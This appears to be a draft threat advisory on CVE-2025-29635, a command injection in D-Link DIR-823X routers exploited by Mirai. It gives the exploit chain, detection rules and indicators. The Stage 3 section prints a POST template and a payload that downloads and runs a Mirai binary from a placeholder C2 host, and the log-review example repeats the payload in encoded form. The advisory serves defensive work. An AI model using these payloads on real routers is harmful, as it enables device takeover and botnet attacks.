TP-EXP-2025-0005 CVE-2025-29635 high Active Exploitation AI Draft

D-Link DIR-823X Authenticated Command Injection via set_prohibiting API (CVE-2025-29635)

CVE: CVE-2025-29635
Platform: D-Link DIR-823X firmware 240126 / 240802
Type: Command Injection
Severity: HIGH
Status: Active Exploitation
Zero-Day: No
CISA KEV: Listed

Severity Assessment

  • Exploitability: 6/10 — Requires valid administrative credentials; exploitability increases substantially in environments with default or reused passwords, which are prevalent in consumer and SMB router deployments
  • Impact: 8/10 — Full command execution with root privileges on the router; enables persistent access, traffic interception, lateral movement to the local network, and botnet enrollment
  • Weaponization Risk: 9/10 — Active Mirai botnet campaign confirmed by Akamai in April 2026; public PoC (now removed from GitHub) was available prior to exploitation wave
  • Patch Urgency: 10/10 — CISA KEV-listed (2026-04-24), federal deadline 2026-05-08; D-Link has reached EOL/EOS for DIR-823X and will not produce a patch; only remediation is device replacement
  • Detection Coverage: 4/10 — Consumer routers typically lack logging infrastructure; exploitation is difficult to detect without out-of-band network monitoring for anomalous outbound traffic

Summary

CVE-2025-29635 is a command injection vulnerability in the D-Link DIR-823X router, a WiFi 6 (802.11ax) device targeted at consumer and small-business markets. The vulnerability resides in the /goform/set_prohibiting API endpoint, which handles URL filtering and access prohibition configuration. The endpoint fails to adequately sanitize user-supplied input before incorporating it into a system-level command call, allowing an authenticated attacker to inject and execute arbitrary shell commands on the router’s underlying embedded Linux operating system.

An attacker with valid administrative credentials can send a crafted HTTP POST request to the vulnerable endpoint, causing the router firmware to execute attacker-controlled commands with root-level privileges. The CVSS 3.1 base score is 7.2 (High) with the vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H. The PR:H designation reflects the requirement for administrative credentials, which Mirai-family threat actors routinely obtain by credential stuffing against default and commonly reused router passwords.

D-Link confirmed in security advisory SAP10469 (published September 2025) that all hardware revisions of the DIR-823X have reached End of Life (EOL) and End of Service (EOS). D-Link stated it will not produce a patch for this or any other vulnerability affecting this product line, and strongly recommends that users retire and replace the device. No firmware remediation exists or will be produced.

CISA added CVE-2025-29635 to the Known Exploited Vulnerabilities catalog on 2026-04-24 with a federal agency remediation deadline of 2026-05-08. Akamai documented active exploitation in April 2026 in a Mirai botnet campaign targeting D-Link devices, in which compromised routers were enrolled as DDoS nodes.

CVE-2025-29635 was disclosed via NVD on 2025-03-25. Active exploitation was confirmed approximately thirteen months later in April 2026, classifying it as a known-exploited n-day vulnerability.

Exploit Chain

Stage 1: Administrative Credential Acquisition

The attacker obtains valid administrative credentials for the target DIR-823X router. Common acquisition methods include credential stuffing using vendor-default password combinations (D-Link routers ship with predictable default credentials), brute-force attacks against the router web interface if remote management is enabled, and credential harvesting from previously compromised devices or networks sharing the same password.

Stage 2: Reconnaissance of the Management Interface

The attacker accesses the DIR-823X web management interface and identifies the firmware version (240126 or 240802) as vulnerable. The /goform/set_prohibiting endpoint is part of the router’s parental controls and URL filtering functionality and is present in both affected firmware builds.

Stage 3: Command Injection via Crafted POST Request

The attacker sends an HTTP POST request to /goform/set_prohibiting with a payload that injects shell metacharacters into a field processed by the router’s command execution handler. Example structure (parameters and injection point vary by firmware version):

POST /goform/set_prohibiting HTTP/1.1
Host: <router_ip>
Cookie: uid=<session_token>
Content-Type: application/x-www-form-urlencoded

prohibiting_addr=<injected_payload>&...

The router firmware concatenates the attacker-controlled value into a shell command without sanitization. A payload such as ; wget http://<c2>/mirai.arm -O /tmp/m; chmod +x /tmp/m; /tmp/m causes the router to download and execute a Mirai agent binary.

Stage 4: Botnet Enrollment and Persistence

The Mirai agent binary connects to a command-and-control server and registers the compromised router as a DDoS-capable bot. Mirai persists on rebooting routers by writing to temporary storage and re-downloading the binary if removed. The compromised router is then used to conduct volumetric network flood attacks against external targets designated by the C2 operator.

Detection Guidance

Network-based monitoring (most effective for consumer routers):

  • Monitor DNS queries and outbound connections from router management IP addresses to unfamiliar external hosts, particularly during off-hours; Mirai C2 registration traffic produces distinctive DNS lookup patterns
  • Alert on outbound connections from the router’s management interface to known Mirai C2 IP ranges and botnets tracked by threat intelligence feeds
  • Monitor for sudden spikes in outbound UDP or TCP traffic from devices behind the router consistent with DDoS flood participation

Web server log review (if accessible):

  • Review router access logs for POST requests to /goform/set_prohibiting from unexpected source IP addresses or at unexpected times
  • Flag requests containing shell metacharacters (; | & $ \ > < ( ) `) in POST body parameters associated with the prohibition URL filtering fields
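As an added example (not part of the advisory or any vendor tooling), the two log-review rules above applied to constructed router access-log records; the record layout, the trusted LAN range and the prohibiting_addr field name are assumptions, since real DIR-823X logs and firmware-specific parameter names differ.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Endpoint named in the advisory.
ENDPOINT = "/goform/set_prohibiting"
# Shell metacharacters from the log-review guidance above.
META_RE = re.compile(r"[;|&$\\><()`]")
# Assumed trusted management network; adjust to the site's LAN range.
TRUSTED_LAN = ipaddress.ip_network("192.168.0.0/24")

# Assumed log record layout (constructed for this example; real router logs differ):
#   <src_ip> <method> <path> <status> [<urlencoded body>]
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})(?: (.*))?$")


def review_line(line):
    """Return the reasons a record should be flagged (empty list if benign)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return ["unparseable record"]
    src, method, path, _status, body = m.groups()
    if path != ENDPOINT or method != "POST":
        return []
    reasons = []
    # Rule 1: request to the vulnerable endpoint from outside the trusted LAN.
    if ipaddress.ip_address(src) not in TRUSTED_LAN:
        reasons.append("untrusted source %s" % src)
    # Rule 2: shell metacharacters in any percent-decoded body parameter value.
    for name, values in parse_qs(body or "", keep_blank_values=True).items():
        if any(META_RE.search(v) for v in values):
            reasons.append("shell metacharacter in parameter %s" % name)
    return reasons


def review_log(lines):
    """Map the index of each flagged record to its reasons."""
    return {i: r for i, r in ((i, review_line(l)) for i, l in enumerate(lines)) if r}


# Constructed sample records (not real captures); record 2 mirrors the payload shape in Stage 3.
SAMPLE_LOG = [
    "192.168.0.10 POST /goform/set_prohibiting 200 prohibiting_addr=example.com&enable=1",
    "192.168.0.10 GET /index.html 200",
    "203.0.113.7 POST /goform/set_prohibiting 200 prohibiting_addr=%3Bwget+http%3A%2F%2F192.0.2.9%2Fm+-O+%2Ftmp%2Fm%3B&enable=1",
    "192.168.0.22 POST /goform/set_prohibiting 200 prohibiting_addr=evil.test%60id%60",
]

if __name__ == "__main__":
    for idx, reasons in review_log(SAMPLE_LOG).items():
        print(idx, reasons)
```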

Authentication anomaly detection:

  • Alert on multiple failed login attempts to the router web interface from external IP addresses — indicative of credential stuffing preceding exploitation
  • Disable remote management on the WAN interface if not required; restrict access to trusted LAN IPs only

Firmware and device posture:

  • Inventory all D-Link DIR-823X devices and confirm firmware version; both 240126 and 240802 are vulnerable and no patch exists
  • Since no remediation is available, the recommended action is device replacement per D-Link’s own advisory

Indicators of Compromise

The following indicators are characteristic of Mirai botnet exploitation of CVE-2025-29635 as documented by Akamai and CISA in April 2026.

  • POST requests to /goform/set_prohibiting in router web server logs from unexpected IP addresses
  • Unexpected outbound connections from the router to external IP addresses not associated with ISP infrastructure or legitimate update services, particularly on high UDP or raw socket ports
  • Presence of unknown processes or binary files in /tmp/ on the router filesystem (accessible via Telnet/SSH diagnostic access if enabled)
  • Unusual outbound traffic volume from the router’s WAN interface inconsistent with normal household or business usage patterns
  • D-Link DIR-823X devices running firmware 240126 or 240802 with no firmware upgrade path available

Disclosure Timeline

Date        Event
2025-03-25  CVE-2025-29635 published to MITRE/NVD with command injection description; firmware versions 240126 and 240802 identified as affected
2025-09-29  D-Link publishes security advisory SAP10469 acknowledging DIR-823X EOL/EOS status and declining to produce a patch
2026-04-24  Akamai publishes research documenting active Mirai botnet campaign targeting D-Link DIR-823X devices via CVE-2025-29635
2026-04-24  CISA adds CVE-2025-29635 to the Known Exploited Vulnerabilities catalog with a federal remediation deadline of 2026-05-08

Sources & References